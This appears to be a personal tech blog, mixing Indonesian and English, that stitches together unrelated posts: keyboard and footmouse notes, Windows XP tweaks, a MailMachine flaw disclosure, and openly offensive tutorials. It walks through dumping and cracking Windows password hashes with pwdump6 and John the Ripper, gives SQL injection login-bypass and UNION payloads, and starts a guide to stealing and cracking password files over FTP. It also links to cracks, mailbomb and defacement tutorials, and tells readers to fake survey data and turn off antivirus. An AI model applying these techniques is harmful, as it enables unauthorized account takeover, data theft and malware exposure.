Menggunakan Footmouse lebih lambat dari pada menngunakan mouse normal, karena sekarang kebanyakan,orang lebih bisa mengontrol tangannya dari pada kaki mereka. Jika Footmouse dapat di gunakan secara bersamaan dengan keyboard, maka cursor dapat digerakkan atau dipindahkan ketika kita sedang mengetik, jadi dapat mengurangi terbuangnya waktu ketika kita menggerakkan tangan antara keyboard dan mouse.Jika seseorang tidak dapat menggunakan Keyboard, maka Keyboard Virtual adalah pilihan terbaik.keyboard virtual ini dapat digunakan dengan meng-click/menyentuh karakter yang diinginkan yang terdapat dilayar. Beberapa orang yang kurang dapat mengendalikan kaki mereka, tidak dapat menggunakan Footmouse dan kadang-kadang mereka harus mempelajarinya dengan serius.

Jika Footmouse digunakan untuk waktu yang cukup lama maka akan mengakibatkan "kram" pada kaki dan dapat berdampak negatif pada tulang punggung.


Jika suatu footmouse digunakan salah dalam jangka waktu panjang, [itu] dapat menyebabkan otot memaksa kaki, dan dapat mempunyai suatu pengaruh hal negatif pada [atas] permasalahan punggung lebih rendah.

source: wikipedia [udah ditranslate]

Jenis-jenis Keyboard

Keyboard adalah alat untuk menuliskan perintah melalui aksara dan angka ke dalam layar monitor yang sebelumnya perintah tersebut diolah secara elektronis oleh Central Processing Unit (CPU). Bentuk keyboard secara umum sama dengan tombol pada mesin ketik, perbedaannya adalah jumlah tombol keyboard untuk aksara, angka dan perintah lainnya lebih banyak dari pada yang terdapat pada mesin ketik. Data atau perintah dapat dimasukkan ke dalam komputer melalui keyboard. Jadi keyboard merupakan penghubung antara manusia dan komputer.


a. Keyboard QWERTY



Sesuai dengan namanya QWERTY yang merupakan deretan huruf pada barisan paling atas pada keyboard. Keyboard ini diproduksi oleh Perusahaan Remington pada tahun 1873 dan rancangan keyboard ini pertama kali digunakan pada mesin ketik di USA tahun 1874. Keyboard QWERTY merupakan pengembangan dari mesin ketik. Susunan tombol dipilih untuk mengurangi loncatan penekanan tombol yang tidak sengaja pada mesin ketik manual. Misal huruf ‘s’, ‘t’, dan ‘h’ diletakkan berjauhan meskipun sering digunakan bersama dalam kalimat bahasa Inggris. Sampai saat ini, keyboard jenis Qwerty tetap digunakan.


b. Keyboard DVORAK



Keyboard ini dibuat pada tahun 1936. Keyboard Dvorak diciptakan berdasarkan prinsip kerja biomekanis dan efisiensi. Susunan letak tombol huruf dengan jenis QWERTY dibuat sedemikian rupa sehingga 56 % ketukan ada pada tangan kanan dan jari-jari yang lebih banyak bekerja adalah jari telunjuk, jari tengah, dan jari manis. Susunan tombol huruf berdasarkan frekuensi penggunaannya. Huruf-huruf yang ada pada baris tengah lebih sering diketuk kira-kira sampai 70 % dan perpindahan antar baris hanya sekitar 10 %,huruf-huruf yang umum, biasanya berada dibawah jari-jari yang dominan dan Mampu meningkatkan kecepatan pengetikan 10 – 15 % serta mengurangi kelelahan tangan

c. Keyboard KLOCKENBERG



Keyboard ini dibuat dengan maksud menyempurnakan jenis keyboard yang sudah ada, yaitu dengan memisahkan kedua bagian keyboard (bagian kiri dan kanan). Bagian kiri dan kanan keyboard dipisahkan dengan sudut 15 derajat dan dibuat miring ke bawah. Selain itu, keyboard KLOCKENBERG mempunyai tombol-tombol yang dibuat lebih dekat (tipis) dengan meja kerja sehingga terasa lebih nyaman. Keyboard KLOCKENBERG tampak lucu karena dipisahkan bagian kiri dan kanannya yang relatif lebih banyak memakan ruang


d. CHORD Keyboard

Hanya mempunyai beberapa tombol antara 4 sampai 5. Untuk memasukkan suatu huruf harus menekan beberapa tombol secara bersamaan. Ukurannya kompak, sangat cocok untuk aplikasi yang portabel. Waktu pelatihan singkat, penekanan tombo-tombol mencerminkan bentuk huruf yang diinginkan Kecepatannya tinggi Kurang populer, karena pada pemakaian yang lama akan menyebabkan kelelahan pada tangan.


e. keyboard MALTRON

Tak seperti keyboard pada umumnya yang datar, keyboard ini dibuat agak cekung ke dalam. Dengan pertimbangan bahwa pada saat jari-jari diposisikan akan mengetik, maka jari-jari itu dijamin tidak akan membentuk satu garis lurus. Produsen Maltron berkeyakinan bahwa pada dasarnya, hanya digunakan 8 jari dari sepuluh jari yang tersedia ketika manusia mengetik dengan keyboard biasa.Dengan mengetik di keyboard biasa, maka jari tangan harus beradaptasi dengan bentuk keyboard. Hal ini diklaim oleh mereka dapat menyebabkan RSI (Repetitive Stress Injuries). Sementara, dengan menggunakan Maltron, keyboardnyalah yang akan menyesuaikan dengan tangan. Dengan bentuk yang unik seperti ini, Maltron menjamin kenyamanan jari tangan di saat mengetik sehingga tidak menyebabkan RSI bahkan bisa jadi akan meningkatkan kecepatan mengetik sebab yang digunakan adalah 10 jari bukannya 8 jari.


f. Keyboard Proyeksi

Untuk menghemat tempat (diletakkan di atas permukaan apa saja asalkan datar), Bekerja dengan menggunakan sensor gerak, jika jari melakukan gerak tertentu, sistem scanning akan mengirim sinyal ke chip komputer seolah user menekan tombol tertentu. Digunakan misalnya pada PDA sebagai pengganti mouse.

Create Additional shortcut on Right click

Once done, you will be able to right click any file or folder and use the Browse for Folder dialog to choose the location you want to move or copy your file or folder to, without having to go to the destination path, its cool!

First we will add the copy and move options to the right click menu of all FILES.

CLICK Start>Run, type REGEDIT and click OK to open up the registry editor and make your way to this key:

HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers

Right click the ContextMenuHandlers key and choose New>Key.
Name the new key “Copy To” (without the quotes).
Repeat the above and create another new key named Move To.

You should now have two new subkeys under the ContextMenuHandlers key:

HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Copy To
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Move To

Select the Copy To key and in the right hand pane, double click “Default”
Enter this clsid value as the value data:

{C2FBB630-2971-11d1-A18C-00C04FD75D13}

Next , select the Move To key and in the right hand pane set the default value to:

{C2FBB631-2971-11d1-A18C-00C04FD75D13}

This now takes care of the Copy and Move options for the right click context menu of all your files.
Now all that is left is to add the same options to the right click menu of all your folders.
The procedure will be the same as for files but at a different key:

HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHan dlers

Right click ContextMenuHandlers and create a new key named Copy To.
Right click it again and create another new key named Move To.

left click on the right hand pane, add the same default values as you did for Files:

For Copy To:
{C2FBB630-2971-11d1-A18C-00C04FD75D13}
For the Move To:
{C2FBB631-2971-11d1-A18C-00C04FD75D13}

Exit the registry and you are done.

How to Get Rapidshared Account [FREE]

How to Get Rapidshared Account for 1 month, that's right. It no Need to refferal any People or promote your url, just complete an offer and done...that's it.

First at All.. sign in on below url
http://www.freepremiumaccounts.com/?r=347091

It works. It does take some time, but you can get Rapidshare 1 Month Account for Free.

Do this:

- Select reward, enter e-mail (valid one) & password
- Complete Sign Up
- Click Offers (next to Status)
- Click on the Ad
- Register at the PremissionResearch
- Important! Complete Survay! (You have to be resident of the U.S., but if not, make up urself, only thing that you should watch out for is zip code, don't enter random, google for real zip code).
- Important! When you see the page with some softwere instalations, go to 'No Thanks'
- But after that, you have to install Add On (Its PremissionResearch Buying Aplication, harmless, but anti-virus softwere may recodnize it as threat, I disconeccted my Firewall & Anti-Virus, but maybe you don't have to)
* Important! Note: This procedure will install Ad-Ware on your computer. Its harmless and its the only way to get the rapidshare account. Just so you know, so you don't curse me after. I have it. It does nothing.
- Go to your e-mail that you entered
- Go to Spam Box and read the Kelly Jones mail
- Click on the 'Click Here to complete your registration now'
- For completing survay and gettin ur free rapidshare account you need to see 'Thank you' page. Instalation of Add On must be completed (maybe you'll need to restart ur browers of even computer
- Log in PremissionResearch
- Wait for 24 hours and you'll get ur RapidShare of MegaUpload account on your freerapidshareaccount.com account through ur e-mail


I got this offer another blog on Comment box, i've not try this before, coz i still have 1 year Rapidshared Account that i got on "WARNET [Warung Internet] gitu Lho... :)

Clearing the Page File on Shutdown

Another way to set the computer to clear the pagefile without directly editing the registry is:

1.Click on the Start button
2.Go to the Control Panel
3.Administrative Tools
4.Local Security Policy
5.Local Policies
6.Click on Security Options
7.Right hand menu - right click on "Shutdown: Clear Virtual Memory Pagefile"
8.Select "Enable"
9.Reboot


If you want to clear the page file on each shutdown:

1.Start Regedit
2.Go to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\ClearPageFileAtShutdown
3.Set the value to 1

Installing the NetBEUI Protocol

Microsoft no longer supports the NetBEUI protocol as part of WindowsXP.
You can add it as a installable protocol by going to the VALUEADD \ MSFT \ NET \ NETBEUI
directory on the CD ROM.
Note: %SYSTEMROOT% refers to the drive and directory where you installed WindowsXP.
Typically this is in the C:\WINDOWS directory

1.Copy the nbf.sys into the %SYSTEMROOT%\SYSTEM32\DRIVERS\ directory
2.Copy netnbf.inf into the %SYSTEMROOT%\INF\ directory
3.Open the Network connection properties for your local area network and use "Install..." button to add NetBEUI protocol

I included a zipped file with the above files and a simple batch file to copy both to the appropriate directories
This is only if you absolutely need NetBEUI. It is not at all a necessary requirement for most networks

E-Book, Tutorial, Software, Mp3 Update.....

E-Book:

HackerBlackBook.rar http://www.ziddu.com/downloadlink.php?uid=ba2ZlpSsbK%2BaluKnaaqhkZSoZquZmpqu9<br />HackerGuidetoVisualFox7.0.rar http://www.ziddu.com/downloadlink.php?uid=a7GglJuubqyZnOKnZqqhkZSoY6qfnZyu6<br />Anti-Hacker.Toolkit.Third.Edition.ebook-Spy.rar http://rapidshare.com/files/127775930/Anti-Hacker.Toolkit.Third.Edition.ebook-Spy.rar

Tutorial:

telnet.rar [tutorial]<br />http://www.ziddu.com/downloadlink.php?uid=ZbKbmpusabKcnOKnY6qhkZSoYKuil5uo3<br/><br />mailbomb.rar [tutorial] http://www.ziddu.com/downloadlink.php?uid=a6%2Bgm5WnaaqenOKnZqqhkZSoY6uim5eq6<br/><br />webdeface.rar [Tutorial] http://www.ziddu.com/downloadlink.php?uid=bLOelpatb6ufluKnZqqhkZSoY6uinZWu6<br/><br />perintah dasar linux http://www.ziddu.com/download.php?uid=bK%2BclJWra6uhmJmlt6yZlJyiaa6WlJur9

Software:

InternetDownloadManager5.04.rar http://www.ziddu.com/downloadlink.php?uid=bK2bmZemcKyblZ2ttqyZlJyiaK2WlJqt8<br />portable_thunderbird_1.0.7_beta_en-us.zip http://www.ziddu.com/downloadlink.php?uid=Z7KhmJyqaq2ZluKnZaqhkZSoYqqfmJ2u5<br />RecoverMyFiles3.8.0.rar http://www.ziddu.com/downloadlink.php?uid=a7KcmJSmbrObl5attKyZlJyiZq2WlJqn6<br />RecoverMyFiles3.9.rar http://www.ziddu.com/downloadlink.php?uid=Zq%2BblJunbKuinOKnZKqhkZSoYaqfmJeu4<br />networktool.rar [for Web Deface tutorial] http://www.ziddu.com/downloadlink.php?uid=b7OgmZqqbauhmJSntKyZlJyiZq2WlZ2r6<br />Reset_Nokia_Security_Code.rar http://www.ziddu.com/downloadlink.php?uid=ZK2fnJyuY7GbluKnYqqhkZSoX6uil5Ws2<br />MP3toRingtonePro.rar http://www.ziddu.com/downloadlink.php?uid=ZbKblJupYqqZlOKnYqqhkZSoX6uimZSu2<br />DietMP3Crack.rar http://www.ziddu.com/downloadlink.php?uid=aa2dlpWtZ7KgnOKnY6qhkZSoYKuinJeo3<br />Graber.rar [download as Premium User on Rapidshared] http://www.ziddu.com/downloadlink.php?uid=ZrOenZqnZq%2BfnOKnYaqhkZSoXquim5yq1<br />totalvideoconverter3.01.rar http://www.ziddu.com/downloadlink.php?uid=ZLKimpmtZLGZluKnYaqhkZSoXquimZWq1<br />Transtool.rar<br />http://rapidshare.com/files/129591952/Transtool.rar<br /><br />Satellite TY For Pc.rar http://rapidshare.com/files/127761302/Satellite_TY_For_Pc.rar<br />Magic_ISO_Maker__Patch.rar http://rapidshare.com/files/127778321/Magic_ISO_Maker__Patch.rar<br />Active.Desktop.Calendar.7.46.rar http://rapidshare.com/files/156788097/Active.Desktop.Calendar.7.46.rar

MP3:

Abandon_-_All_Because_Of_You.mp3

http://rapidshare.com/files/153722486/Abandon_-_All_Because_Of_You.mp3

Armor_For_Sleep_-_Know_What_You_Have.mp3

http://rapidshare.com/files/153722487/Armor_For_Sleep_-_Know_What_You_Have.mp3

Ashley_Tisdale_-_I_m_Back.mp3

http://rapidshare.com/files/153722488/Ashley_Tisdale_-_I_m_Back.mp3

Bayside_-_I_Cant_Go_On.mp3

http://rapidshare.com/files/153722490/Bayside_-_I_Cant_Go_On.mp3

Bloc_Party_-_Talons.mp3

http://rapidshare.com/files/153722491/Bloc_Party_-_Talons.mp3

Christina_Aguilera_-_Keeps_Gettin_Better.mp3

http://rapidshare.com/files/153722492/Christina_Aguilera_-_Keeps_Gettin_Better.mp3

Cliff_Richard_-_Thank_You_for_A_Lifetime.mp3

http://rapidshare.com/files/153722493/Cliff_Richard_-_Thank_You_for_A_Lifetime.mp3

Daughtry_-_Feels_Like_The_First_Time.mp3

http://rapidshare.com/files/153722494/Daughtry_-_Feels_Like_The_First_Time.mp3

DecemberRadio_-_Find_You_Waiting.mp3

http://rapidshare.com/files/153722495/DecemberRadio_-_Find_You_Waiting.mp3

Elena_Norde_-_I_Dont_Wanna.mp3

http://rapidshare.com/files/153722496/Elena_Norde_-_I_Dont_Wanna.mp3

NOTE: All Of this Files is "NOT STORE ON THIS BLOG". All files store on third party website.

Another way to H**K account Administrator

Gunakan tolls pwdump6 dan john the ripper, ekstrak file zip ke dalam folder

1. Jalankan CMD (Run->cmd)

2. Masuk ke direktori pwdump. Jalankan pwdump6 dengan perintah :

PwDump.exe -o pass.txt 127.0.0.1


pwdump6 Version 1.3.0 by fizzgig and the mighty group at foofus.net
Copyright 2006 foofus.net

This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.

Using pipe {C411BDE9-594E-47F4-99B5-E94ADF194A45}
Key length is 16
Completed.

3. Setelah itu akan didapatkan file pass.txt yang berisi daftar user dan password yang masih dienkripsi.
Contohnya akan tampak seperti berikut :

ach:1003:2BFA42D08601B951ABD697149E2F5967:73098347042E9109FA584CE843018F4F:::
Administrator:500:934A4750EC9859B3EA397B0F6EC18E34:732BD09D6834DA4A5A30300A6A045BF8:::
coba:1004:FBE4F28EE205F0BA79999C25263AA9AA:A69C199A4DF77CD41FCA6EA916A93868:::
Guest:501:NO PASSWORD********************* :NO PASSWORD*********************:::
HelpAssistant:1000:B3D2AE56C93F27B43C4F8419B1A21E9B: DC3DBB258A10B0C7EA9D92133267B905:::
SUPPORT_388945a0:1002:NO PASSWORD*********************: DF1DB672DA1B5C045ECA2490CA753D3B:::

4. Copy file pass.txt ke dalam folder tempat “john-386.exe” berada, jalankan perintah berikut dan tunggu dengan sabar :

john-386.exe pass.txt
Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])
REN123 (Administrator:2)
TEBAK (coba:2)
ADMINKE (Administrator:1)
MUDAHDI (coba:1)

Yosh!! sekarang passwordnya sudah terlihat secara kasat mata. Jadi password untuk user “Administrator” adalah “adminkeren123?, diperoleh dari menggabungkan Administrator:2 dan Administrator:2.

Administrator:1+Administrator:2 = adminkeren123

Sedangkan untuk user “coba” adalah “mudahditebak”!!

source: Internet dan Blog

SQL Attacks Hacking

This i found over
the internet. When at first i randomly typed any password. then it gave an sql
error that " zero row selected" and incorrect password. So I thought of using
SQL string injection . SQL is poor in security issues surrounding is the login
and url strings. So idea is you give these values in login form :

user : ' OR 1=1–

password : ' OR 1=1–

and voila you are
in. the other possible strings for password are :

• ' OR a=a–
  
• ' or 0=0 #
  
• ") or ("a"="a
  
  
• ') or ('a'='a
  

So whats the funda
behind this :

When you click "login" or "enter" on webpage the variables 'userid' and 'password'
are to sql. The underlying query is :

SELECT * from auth_db
where username = ' $userid ' AND password = '$password'

So if you have
entered username = admin and password = test123 then query executed will be
:

SELECT * from auth_db where username = ' admin ' AND password = 'test123 '

So in auth_db ,
if userid and password are correct than corresponding row will be selected and
as no of rows returned is > 0 you will be granted access. But if password
is incorrect than it will retun zero rows and permission won't be granted. But
if you use SQL string injection like if you put ' OR 1=1– as password and username
both than query executed will be :

SELECT * from auth_db
where username = ' ' OR 1=1– ' AND password = '' OR 1=1– '

Because a pair
of hyphens designate the beginning of a comment in SQL, the query becomes simply
becomes :

SELECT * from auth_db
where username = '' OR 1=1

The expression
1=1 is always true for every row in the table, and a true expression or'd with
another expression will always return true. So, assuming there's at least one
row in the Users table, this SQL will always return a nonzero count of records.So
you are logged in now. And if in some cases But many times sql tries to parse
= character in input strings and didn't allow to do so, hence trick is using
:

' OR userid LIKE '%%

So resultant query
will be

SELECT * from auth_db
where username = ' ' OR userid LIKE '%% ' AND password = '' OR userid LIKE '%%
'

So every string matches '%%' so it returns non zero number of and you are granted
access.

Not all SQL injection attacks involve forms authentication. All it takes is
an application with some dynamically constructed SQL and untrusted user input.
Most SQL-compliant databases, including SQL Server, store metadata in a series
of system tables with the names sysobjects, syscolumns, sysindexes, and so on.
This means that a hacker could use the system tables to ascertain schema information
for a database to assist in the further compromise of the database. For example,
the following text entered into the txtFilter textbox might be used to reveal
the names of the user tables in the database:

' UNION SELECT id, name, '', 0 FROM sysobjects WHERE
xtype ='U' --

The UNION statement
in particular is useful to a hacker because it allows him to splice the results
of one query onto another. In this case, the hacker has spliced the names of
the user tables in the database to the original query of the Products table.
The only trick is to match the number and datatypes of the columns to the original
query. The previous query might reveal that a table named Users exists in the
database. So after this with multiple queries you can get control over database.

 

********************************************************************************

WARNING: the information provided is for educationally purposes only and not
to be used for malicious use. i hold no responsibility

********************************************************************************

source:Blog
[which no exits anymore].

Google Adsense Alternative

Iya, seperti judulnya " Google Adsense Alternative" bagi kamu-kamu yang sudah daftar/register di google tapi blom di approve sampai sekarang :) [ kayak gw, udah di approve ee.... nggak taunya kena banned :( trus daftar lagi, unfortunately buat lokasi indonesia udah nggak bisa lagi [ denger-denger kayak gitu].

Jadi sekarang gw coba ngepost-ing cara menghasilkan dollar or duit atau apalah dari internet selain dari [Ads by Google] Google Adsense. [P.S: sebagai catatan aja, yang akan kita bahas sekarang ini bukan Paid to Click [PTP] program, clicking Ads[e.g: bux.to], reading email and get paid[e.g: agloco mail], surf ads[e.g ts25, easyhits4u.com] dan review website[e.g: AWSurvey] dan lain sebagainya that i can't mentions one by one.

so let get start dari earing yang paling banyak gw kumpulinsampai saat ini, :)

1. Adster
Iya, Adster.tapi sayangnya "NO refferal" minimum payouts for free members adalah $60 trus untuk earning yang dihasilkan dibagi 2, untuk yang mempublikasikannya dan untuk adster itu sendiri, btw kita bisa menentukan sendiri persen yang akan dibagikan antara kedua belah pihak, so Enjoy.. :) :))

2. Chitika



Iklan berbasis page visit, dan unique IP addres, sementara iklannya hanya men-support image [mostly] dan untuk text ads masih minim or coming soon [itu kata dari official website chitika], trus uniknya chitika ini mempunyai iklan yang dikhususkan untuk zona/daerah Amerika dan Canada "ONLY" so bagi yang punya traffic Amerika dan Canada dapat memanfaatkan fasilitas ini, minimum payouts $50 via Paypal or check yang akan dikirim right the way on your home address.

3. Adbrite



ini pasti pada udah tau, so "NO Comment" mungkin review dikit kali yah, adbrite hanya akan menampilkan iklan mereka jika blog/website kita page viewnya, artikelnya dan unique visitor-nya "gede", so, siap-siap yang punya blog/website yang traffic-nya minim or bahkan low, kalian hanya akan lihat iklan " ads by Adbrite" tanpa ada perubahan, alias nggak ada yang tertarik buat masang iklan di blog or website lu :) :) :) :) [rasain....] lain halnya dengan Adster, Chitika dan Google <<<<< [ sayang udah nggak bisa lagi :( ] mereka akan senantiasa menampilkan iklannya tanpa peduli ada yang kunjungi atau tidak blog/website kamu.

4. Blueadvertise



Gw baru aja join ini program, ternyata ....nice :) blueadvertise memanfaatkan unique visitor ip dan lamanya user berada di blog/website, tentang payment method bisa melalui paypal, alertpay, dan check dan yang paling penting support refferal. 5. Ceoads.com Iklan tanpa harus di click, hanya memanfaatkan unique ip per 1000/visitor, earning yang dihasilkan adalah $3,6 dollar langsung di transfer ke Paypal or Alertpay, support Refferal.


6. ADDITIONAL...[you can try by your self :) ]
- pub.oxado ---> iklan international, lebih banyak images dari pada text ads. earning EURO...

- Adspeedy ---> indonesia punya, earning berdasarkan banyak click dan unique page view

- PPC indonesia --> Indonesia Ads, tapi cuman bisa letak ads pada blog yg di approve aja.INGAT

- Adsensecamp --> You know-lah.... kembaranya google adsense.


That's all.......kalo ada yang nggak jelas or mau di tanyakan.... be my guest[ane juga lagi belajar] dengan meninggalkan message di shoutbox....

Increasing File System Caching

To increase the amount of memory Windows will locked for I/O operations:

1. Start Regedit
2. Go to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
3. Edit the key IoPageLockLimit

4096 - 32megs of memory or less
8192 - 32+ megs of memory
16384 - 64+ megs of memory
32768 - 128+ megs of memory
65536 - 256+ megs of memory

Adding SafeBoot to the Boot Menu

You can add Safeboot as an option to the normal XP boot screen

1.Open a command prompt
2.Copy the current c:\boot.ini to another name (just in case)
3.With your favorite text editor, edit c:\boot.ini
4.Copy then edit the current boot line to another line. For example:
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect
might copy and then change to:
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional Safeboot" /fastdetect
5.Start MSCONFIG
6.Click on the BOOT.INI tab
7.Highlight the second line with the additional name of Safeboot
8.Check the /SAFEBOOT box with option you want
Minimal - Minimal set of drivers
Network - With Network Support
Dsrepair - Directory Services Repair
Minimal (Alternate Shell) - Standard Explorer Desktop
9.You will now have this option every time you start XP

MailMachine flaws

-> What is MailMachine.cgi?



MailMachine is a perl CGI script written by Mike's World (http://www.mikesworld.net). MailMachine is described as:



"Mail Machine is a great mailing list script that allows visitors to your website to subscribe and unsubscribe to your mailing list without ANY work from you. This is a great way to inform your visitors on what's happening, and bring them back!"



The reason I have written this is not to encourage people to go and mess up servers with MailMachine running - it is to make people realise it is not a secure script. Hopefully the author will then take notice of what I have said and do something about it.



-> What flaws are present?



I recently downloaded MailMachine for use on my server, and after a couple of test runs I realised that a number of flaws are present. Here are the problems I found, although there are probably a lot more:



1) Subscribing



When the 'confirm subscription' option is on, it is easy for anyone to guess the confirmation url they need to go to confirm the subscription as it follows this format:



http://www.domain.com/cgi-bin/mailmachine.cgi?



So, a hacker could subscribe anyone he wants to the list by first entering their email address and clicking subscribe, and then confirming the subscription by adding a ? on the end of the scripts location. This renders MailMachine's confirm subscription option useless.



2) Unsubscribing



The same type of security problem is present, except this time a confirmation is not even necessary. A member of the list can unsubscribe themselves at any time by going to:



http://www.domain.com/cgi-bin/mailmachine.cgi?



No confirmation will be sent, they will simply recieve a email to say they have been unsubscribed. So, a hacker can unsubscribe anyone from the list by going to that address. This effectively means that anyone can unsubscribe anyone.



3) Permissions



"Email.txt" and "Temp.txt" hold the subscribed emails and the 'to be confirmed' email addresses respectfully. By default the permissions set to the files "email.txt" and "temp.txt" means that the two files can be read by anyone. A hacker could access the file "email.txt" and unsubscribe everyone from the list using the technique mentioned above.



4) Banned addresses



The owner of the list is allowed to specify some banned addresses, however, these banned addresses are cAsE sensitive. So, if I ban the address:



trouble@hacker.com



That email can still be easily subscribed to the list by subscribing the address:



Trouble@hacker.com



(Notice the capital 'T')



This makes it very difficult and annoying for a mailing list admin to actually ban an address.



5) More Case problems



MailMachine makes checks to see if someone who tries to subscribe is already subscribed. The case sensitivity is also present on subscribing an address. Therefore, the checks that mailmachine makes to see if the address is already subscribed are pointless - even with checks, if you@you.com is subscribed - You@you.com would be allowed.



6) Major problems with www.hotmail.com



When a confirmatiom email is sent, the address the recipient must click will look something like this:



http://www.domain.com/cgi-bin/mailmachine.cgi?



Clicking this link should then send the person to the screen which will confirm their subscription...however, if the email is sent to a hotmail account, this will not happen.



Hotmail does not read the '?' as part of the actual link, and therefore cuts off everything after the ? - so the address the recipient is actually taken to would be:



http://www.domain.com/cgi-bin/mailmachine.cgi



Which will not confirm their subscription...this makes it difficult for a hotmail user to confirm his or her subscription.



--> Suggested fixes



There are a lot of problems, but they can all easily be fixed. I suggest that the author does the following:



1> Make the confirmation link have a unique code at the end, for example:



Instead of: http://www.domain.com/cgi-bin/mailmachine.cgi?



Make it: http://www.domain.com/cgi-bin/mailmachine.cgi?Qs672n



2> When checks are done to see if an address is subscribed or banned - convert the email addresses to full uppercase. Then there will be no case sensitivity issues.



3> Add a feature so that the admin can send a confirmation for each unsubscribe request.



4> Send emails in html. This gets rid of the hotmail '?' bug as it is part of a link.



5> Provide information on how to chmod or secure the email.txt and temp.txt files correctly.



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Adding / Removing Additional Programs

By default, WindowsXP does not display all the programs you can add or remove.
To show this list:
Edit the \Windows\Inf\sysoc.inf file
In the Components section, simply remove the word hide.
This will leave two commas together (like on the rest of the items).
Then you can go to the Control Panel / Add or Remove Programs / Add/Remove Windows Components and the new items will be displayed.

[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
msnexplr=ocmsn.dll,OcEntry,msnmsn.inf,,7
smarttgs=ocgen.dll,OcEntry,msnsl.inf,,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
Games=ocgen.dll,OcEntry,games.inf,,7
AccessUtil=ocgen.dll,OcEntry,accessor.inf,,7
CommApps=ocgen.dll,OcEntry,communic.inf,HIDE,7
MultiM=ocgen.dll,OcEntry,multimed.inf,HIDE,7
AccessOpt=ocgen.dll,OcEntry,optional.inf,HIDE,7
Pinball=ocgen.dll,OcEntry,pinball.inf,HIDE,7
MSWordPad=ocgen.dll,OcEntry,wordpad.inf,HIDE,7
ZoneGames=zoneoc.dll,ZoneSetupProc,igames.inf,,7

NTLDR or NTDETECT.COM Not Found

If you get an error that NTLDR is not found during bootup,
If you have FAT32 partitions, it is much simpler than with NTFS.
Just boot with a Win98 floppy and copy the NTLDR or NTDETECT.COM files
from the i386 directory to the root of the C:\ drive.
For NTFS:

1.Insert and boot from your WindowsXP CD.
2.At the first R=Repair option, press the R key
3.Press the number that corresponds to the correct location for the installation of Windows you want to repair.
Typically this will be #1
4.Enter in the administrator password when requested
5.Enter in the following commands (X: is replaced by the actual drive letter that is assigned to the CD ROM drive.
COPY X:\i386\NTLDR C\:
COPY X:\i386\NTDETECT.COM C:\
6.Take out the CD ROM and type exit

Hacking Webpages

Getting the Password File Through FTP

Ok well one of the easiest ways of getting superuser access is through
anonymous ftp access into a webpage. First you need learn a little about
the password file...

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

This is an example of a regular encrypted password file. The Superuser is
the part that gives you root. That's the main part of the file.

root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp

This is another example of a password file, only this one has one little
difference, it's shadowed. Shadowed password files don't let you

view or
copy the actual encrypted password. This causes problems for the password
cracker and dictionary maker(both explained later in the text). Below is
another example of a shadowed password file:

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Shadowed password files have an "x" in the place of a password or sometimes
they are disguised as an * as well.

Now that you know a little more about what the actual password file looks
like you should be able to identify a normal encrypted pw from a shadowed
pw file. We can now go on to talk about how to crack it.

Cracking a password file isn't as complicated as it would seem, although the
files vary from system to system. 1.The first step that you would take is
to download or copy the file. 2. The second step is to find a password
cracker and a dictionary maker. Although it's nearly impossible to find a
good cracker there are a few ok ones out there. I recomend that you look
for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper.
Now for a dictionary maker or a dictionary file... When you start a
cracking prog you will be asked to find the the password file. That's where
a dictionary maker comes in. You can download one from nearly every hacker
page on the net. A dictionary maker finds all the possible letter
combinations with the alphabet that you choose(ASCII, caps, lowercase, and
